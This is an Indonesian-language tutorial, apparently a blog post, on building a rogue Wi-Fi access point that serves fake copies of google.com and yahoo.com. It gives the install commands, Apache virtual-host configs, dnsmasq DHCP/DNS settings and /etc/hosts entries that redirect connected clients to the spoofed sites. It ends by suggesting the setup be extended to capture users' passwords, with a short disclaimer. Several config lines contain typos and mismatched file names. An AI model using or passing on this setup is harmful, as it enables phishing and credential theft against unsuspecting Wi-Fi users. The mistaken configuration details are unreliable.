Rouge Access Point
Untuk menjebak user dengan access point, sekarang anda dapat membuat access point palsu sebagai pembuktian teori sederhana. Yang perlu anda persiapkan antara lain:
1.Web server
2.dns server
3.Web palsu
Mulai membuat access point palsu serta halaman-halaman web palsu. halaman web palsu yang akan kita siapkan pada server lokal adalah halaman web dari www.google.com dan halaman www.yahoo.com.
Buka terminal dan login-lah sebagai root, lalu ikutilah langkah-langkah berikut:
1.Pertama, intall web server dan dns dalam hal ini web server yang digunakan apache2 dan dnsmasq:
# apt-get install apache2 dnsmasq
2.Kedua, buatlah direktori untuk meletakkan halaman web palsu:
# mkdir -p /home/www/rouge/google.com
# mkdir -p /home/www/rouge/yahoo.com
Simpan website dari google.com dan yahoo.com sesuai direktori yang telah dibuat, laku konfigurasi web server apache sebagai berikut:
# vi /etc/apache2/sites-available/rouge.google.com
Isi file /etc/apache2/sites-available/rouge.google.com dengan konfigurasi berikut:
NamaVirtualHost *
ServerName google.com
ServerAlias www.google.com
DocumentRoot /home/www/rouge/google.com
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
Simpan konfigurasi tersebut dan keluar, lalu lakukan hal yang sama untuk membuat konfigurasi dari website yahoo.com palsu, sebagai berikut:
# vi /etc/apache2/sites-available/rouge.yahoo.com
Isi file /etc/apache2/sites-available/rouge.google.com dengan konfigurasi berikut:
NamaVirtualHost *
ServerName yahoo.com
ServerAlias www.yahoo.com
DocumentRoot /home/www/rouge/yahoo.com
Options FollowSymLinks
AllowOverride None
Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all
Simpan konfigurasi tersebut dan keluar.
3.Ketiga, mengaktifkan konfigurasi situs palsu tersebut dengan perintah sebagai berikut:
# a2ensite rouge.google.com
# a2ensite rouge.yahoo.com
Sampai disini kita telah membuat dua website palsu, selanjutnya adalah mempersiapkan DHCP server yang akan memberikan IP address kepada client, serta berfungsi sebagai DNS server.
4.Keempat, konfigurasi DNS server, sebagai berikut:
#vi /etc/dnsmasq.com
Isikan file /etc/dnsmasq.com dengan konfigurasi berikut:
interface=eth0
domain=riverside.com
dhcp-lease-max=50
dhcp-authoritative
dhcp-range=192.168.0.10,192.168.1.100,1440m
Simpan konfigurasi tersebut dan keluar. Selanjutnya, membuat record host name dari kedua domain tersebut.
5.Kelima, membuat Record Host Name, sebagai berikut:
# vi /etc/hosts
Isikan file ini pada /etc/hosts dengan kedua record domain tersebut seperti:
192.168.0.1 www.google.com
192.168.0.1 google.com
192.168.0.1 www.yahoo.com
192.168.0.1 yahoo.com
Sampai disini persiapan hampir lengkap, konfigurasi wireless card anda dan jalankan web server serta dns server, dengan perintah:
# /etc/init.d/network restart
# /etc/init.d/apache2 restart
# /etc/init.d/dnsmasq restart
Setelah semua berjalan dengan dengan baik, anda tinggal menunggu client yang terkoneksi dengan access point anda dan melihat hasilnya. Yang kita lakukan hanyalah membuat access point sederhana yang dapat menipu client. Bayangkan jika kita memodifikasi agar dapat menangkap password dari user, bukankah akan sangat berbahaya bagi client yang tidak tahu apa-apa?.
Hacking adalah seni dan keilmuan, sehingga segala penyalahgunaan artikel ini diluar tanggung jawab penulis.




